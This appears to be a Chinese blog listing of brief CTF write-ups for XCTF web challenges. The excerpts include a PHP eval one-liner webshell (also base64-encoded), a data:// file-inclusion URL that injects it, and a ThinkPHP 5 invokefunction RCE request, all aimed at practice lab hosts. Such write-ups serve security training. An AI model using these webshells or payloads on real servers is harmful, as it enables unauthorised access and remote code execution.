攻防世界web
Nothing-one
这个作者很懒,什么都没留下…
展开
-
攻防世界-ics-06
打开之后我们看到这里虽然比较多但是我们只能点开一个也就是报表中心在里面我们先到id是可变的所以我们用bp抓包来对id进行数字爆破(具体爆破的步骤我就不说了)我们将它点开然后我们就可以在最后看到flag。...原创 2021-07-28 21:00:06 · 80 阅读 · 0 评论 -
攻防世界-Web_php_include
这个考察的是文件包含。通过data://text/plain协议来进行漏洞利用这个我直接用了蚁剑进行了连接,将<?php @eval($_POST['pass']) ?>转化为base64、PD9waHAgQGV2YWwoJF9QT1NUWydwYXNzJ10pID8+Cgo=然后我门http://111.200.241.244:63659/?page=data://text/plain/;base64,PD9waHAgQGV2YWwoJF9QT1NUWydwYXNzJ10pID8原创 2021-07-28 20:41:42 · 78 阅读 · 0 评论 -
攻防世界-php_rce
打开之后我们可以看到这是一个ThinkPHP 5漏洞漏洞分析程序未对控制器进行过滤,导致攻击者可以用 \(斜杠)调用任意类方法。其中Thinkphp的指令在这个网站中https://www.cnblogs.com/backlion/p/10106676.html第一步:http://111.200.241.244:61887/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[.原创 2021-07-28 20:15:41 · 126 阅读 · 0 评论 -
攻防世界-Training-WWW-Robots
我们用御剑后台扫描我们扫描到了一个robots.txt。点开之后就是这个。这是不被允许爬取的页面,我们访问这个页面。原创 2021-07-28 20:00:41 · 55 阅读 · 0 评论 -
攻防世界-baby_web
从题目描述中我们可以看到我们要找到他的初始界面。所以我们就可以将后缀名改为index.php(这是一般网站的首页),将1.php换为index.php我们就可以看到然后直接f12我们查看网站的信息我们就可以看到flag...原创 2021-07-28 19:46:34 · 161 阅读 · 0 评论 -
攻防世界-webshell
从文件中我们可以看到这是一个一句话木马,我们可以直接用蚁剑进行连接连接的密码就是我们“shell”原创 2021-07-28 19:25:09 · 156 阅读 · 0 评论